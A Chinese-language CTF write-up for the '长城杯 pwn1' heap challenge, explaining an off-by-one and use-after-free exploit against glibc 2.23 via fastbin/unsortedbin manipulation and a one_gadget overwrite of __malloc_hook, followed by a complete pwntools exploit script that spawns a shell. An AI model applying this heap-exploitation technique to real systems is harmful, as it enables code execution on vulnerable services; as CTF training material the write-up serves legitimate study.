长城杯pwn1

2021-09-20

Word count: 564 | Reading time≈ 3 min

题目存在off by one 以及UAF漏洞

我们可以利用爆破

低字节修改到malloc-0x23

以及改变fastbin堆的fd指向unsortedbin堆

这样就能在下次申请的时候把这个unsortedbin拉进fastbin

我们只要改这个unsortedbin的fd指针就可以生效了，低字节修改到malloc-0x23。

再去利用off by one修改unsortedbin的大小为fastbin的大小

连续申请两次就可以在heaparry上得到libc的指针

接着再去把unsortedbin的fd改为0，bk改为__memalign_hook(在malloc-0x10上)

再去利用off by one 把unsortedbin大小复原

申请和unsortedbin大小一样的chunk去复原不然无法通过检测

最后利用onegadget打malloc_hook

利用

1 2	# malloc不符合onegadget触发条件 # malloc_printerr触发malloc_hook

最后double的时候即可触发啦

exp

from pwn import *
import time
# context.log_level = 'debug'

local = 1
libc_path = '/home/q/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so'
target = ''.split(':')
target_libc = ''
ogg = [0xf03a4,0xf1247]

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

def add(idx,size):
	sa('>> \n','1')
	sa('input index:\n',str(idx))
	sa('input size:\n',str(size))

def edit(idx,con):
	sa('>> \n','3')
	sa('input index:\n',str(idx))
	sla('input context:\n',con)

def free(idx):
	sa('>> \n','2')
	sa('input index:\n',str(idx))

if local:
	p = process('./pwn')
	libc = ELF(libc_path)
else:
	p = remote(target[0],target[1])
	libc = ELF(target_libc)

sa('>> \n','666')
base = int(rud('\n'),16)-libc.sym['printf']
malloc_hook = base+libc.sym['__malloc_hook']
m_hook = malloc_hook&0xff
success(hex(m_hook))

add(0,0x68)
add(1,0xe0)
add(2,0x60)
free(0)
free(2)
free(0)
free(1)
edit(1,'\xed\x1a')
#gdb.attach(p)
edit(0,'\x70\x80')
#gdb.attach(p)
add(3,0x68)#0 and 3
#gdb.attach(p)

edit(3,'a'*0x68+'\x71')
#gdb.attach(p)

add(4,0x68)#1 and 4
add(5,0x68)#malloc_hook-0x23
#gdb.attach(p)


edit(1,p64(0)+'\x00')
#gdb.attach(p)
edit(0,'a'*0x68+'\xf1')
#gdb.attach(p)
add(6,0xe0)
#gdb.attach(p)
one = (base+ogg[0])
pl = 'a'*19+p8(one&0xff)+p8((one>>8)&0xff)+p8((one>>16)&0xff)
edit(5,pl)
#gdb.attach(p)
free(0)
free(0)
shell()

Copyright： Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.